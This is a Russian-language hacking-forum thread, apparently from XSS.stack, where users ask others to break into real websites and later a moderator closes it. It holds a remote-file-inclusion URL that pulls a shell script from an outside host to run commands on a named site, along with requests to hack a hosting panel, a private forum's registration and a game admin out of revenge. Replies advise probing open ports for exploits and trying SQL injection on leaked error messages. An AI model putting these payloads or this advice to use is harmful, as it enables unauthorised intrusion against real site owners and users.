• XSS.stack #1 – первый литературный журнал от юзеров форума

Просьбы Взломать

Статус
Закрыто для дальнейших ответов.
Я пытался залить шелл (это моя главная задача) таким образом:
Код:
http://www.pogruzchik.ru/catalogl.php?razdel=http://nmb795.narod.ru/shell.php&cmd=ls
Но у меня ничего не выходит!Что я делаю не так

И снова просьба! Удалось поломать сайт, который хостится agava.ru. Пытался там найти панель для клиентов, вроде весь сайт облазил но ненашел. Проблема пустяковая, но нечего не могу сделать. Главный вопроc:где находится панель клиентов?

Всем привет. Я тут конечно новенький ... может всем будет плевать на моё просьбу ... но изложу суть дела.

Был я зарегестрирован на сайте www.drumandbass.ee
Потом благополучно не посещал его, забыл логин .. сменил уже не раз мыло ...
Дело в том что я частенько вижусь в реально жизни с посетителями этого сайта, в частности форума ... и хоЦЦа с ними посидеть там потрещать, но есть всего одно большое НО, там регистрация приватная, высылаешь заявку на ихнее мыло (сайта) ... и быть может, когда-нибудь, к старости получишь регистрацию. Письма высылал, ответов ноль, быть может админ уже паутиной порос .. может уже под землей давно, не знаю. Да может эти письма уже давно и не читают.

Вот просьба и заключается в том, что я всего лишь хочу регистрацию. Думаю в этом ни чего страшного нет :) Буду благодарен, если поможете.

Спасибо за внимание

Ах да, если что, то логин Azazel я там хочу.

Трындец тут придурков развелось. Совсем совесть потеряли: сломайте то да се.
Вообщем тему закрываю
Никто вам ломать ничего не будет
Тот кто заведет еще такую тему с просьой о взломе будет наказан.

[mod][Winux:] Новая тема про взломы на заказ[/mod]

Перед тем как что-то запостить просьбу прочитайте Правила этого топика (займет макс минуту)

Прочитате сл. несколько пунктов

1) У вас есть причина для хака, т.е. если вам нужно помочь сломать сайт just4fun - вы явно не по адресу

2) Мы не рассматриваем просьбы о взломе e-mail, on-line игр (в том числе браузерных), а тем более icq, jabber, sst и все подобные instant messenger'ы.

3) Не надо писать что админ лох (ламер, идиот и т.д.), т.к. если это так то почему вы сами еще не решили эту проблему? Очень приветствуется если вы дадите зацепку... например чтобы нам не терять лишнего времени логин:пасс для сайта (если имеется).

вот и все... еще некотоорая инфа

С эксплоитами сюда не лезть. Они ТуТ

Взлом Хэшей ТуТ

Некоторые тулзы нужные при хаке доступны тут ТуТ

Все нароботки только в форуме, никакого привата,пм, аськи и т.д. Имхо все для людей.

Дерзайте.

PS весь бред, спам, флуд, офттопик будет удаляться + бан на 2 часа (на первый раз) и по нарастающей.

Всем дрям :) как понял эта вторая попытка темы - Прозьба взломать :) надеюсь всё будек ок - попытаюсь очень акуратно строго по правилам задать вопрос :

Представим что я мало смыслю в зломе - так чуть чуть знаю как nmap запустить , зато немного больше шарю в програминге ( тип упорный очень -) ) - посему посоветуйте куда лезть про что читать и я сам прочту и попробую что-нибудь сделать
Вот собственно прозьба :

Наткнулся на один сайт (название умолчим дабы негневать модеров) на паге откопал несколько страниц со следующим содержанием :

1) Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/rnetwork/domains/веб-пага.ком/public_html/директория/название-листа-товара.php on line 136

2) Warning: Division by zero in /home/rnetwork/domains/веб-пага.ком/public_html/russian/название-листа-товара.php on line 90

Warning: Division by zero in /home/rnetwork/domains/веб-пага.ком/public_html/russian/название-листа-товара.php on line 91

3) Показания nmap 4.11 -O -sS

Not shown: 1625 closed ports, 46 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
143/tcp open imap
443/tcp open https
3306/tcp open mysql

Device type: general purpose
Running: Linux 2.4.X|2.5.X
OS details: Linux 2.4.0 - 2.5.20
Uptime 2.674 days (since Mon Sep 18 10:06:36 2006)

Можно ли что-то из этого подчерпнуть какую либо полезную информацию дабы далее как нибудь развернутся на данном ресурсе - буду рад тематическим ссылкам и благодарен дельным советам и вобще умру от счастья если непогибну от рук модеров :)

LaN_DAo
Ищи эксплойты к тому что висит на открытых портах,тока сначала персию узнай.
Для профилактики можешт спайдером просканить.

2) Warning: Division by zero in /home/rnetwork/domains/веб-пага.ком/public_html/russian/название-листа-товара.php on line 90

Warning: Division by zero in /home/rnetwork/domains/веб-пага.ком/public_html/russian/название-листа-товара.php on line 91
ничего интересного

1) Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/rnetwork/domains/веб-пага.ком/public_html/директория/название-листа-товара.php on line 136
возможна инъекция, но не факт. (далеко не факт).

Насчет портов - запусти Спайдера, он скажет гораздо больше интересной информации

я в одной онлайн игре поцапался с их админом, хотелось бы ему отомстить.
В принципе у них есть форум и можно сделать иньекцию, только админ этот довольно-таки в этом деле грамотный.
Каким образом его можно :bang:

В принципе у них есть форум и можно сделать иньекцию
Так делай.

Перевожу:
Я возомнил себя самым крутым, хочу выйграть в онлайн игре. Сделайте там меня админом и вышлите пароли в личку.

Каким образом его можно
Кроме аргументов к взлому, которые скорее всего лживы, ты не сказал ничего. Что ты от нас хочешь?

Легче сразу позвонить и спросить как бы мне вас взломать
вариант :)
Добавлено в [time]1158862444[/time]
багдадский вор
минус за постинг просьбы о взломе не в тему

1) Warning: mysql_fetch_array()

вполне возможна скуль.
не факт. обычно при инъекции при подстановке кавычки вылетает ошибка в запросе к mysql_query(). Хотя мб тут blind sql-inj.

Статус
Закрыто для дальнейших ответов.
Верх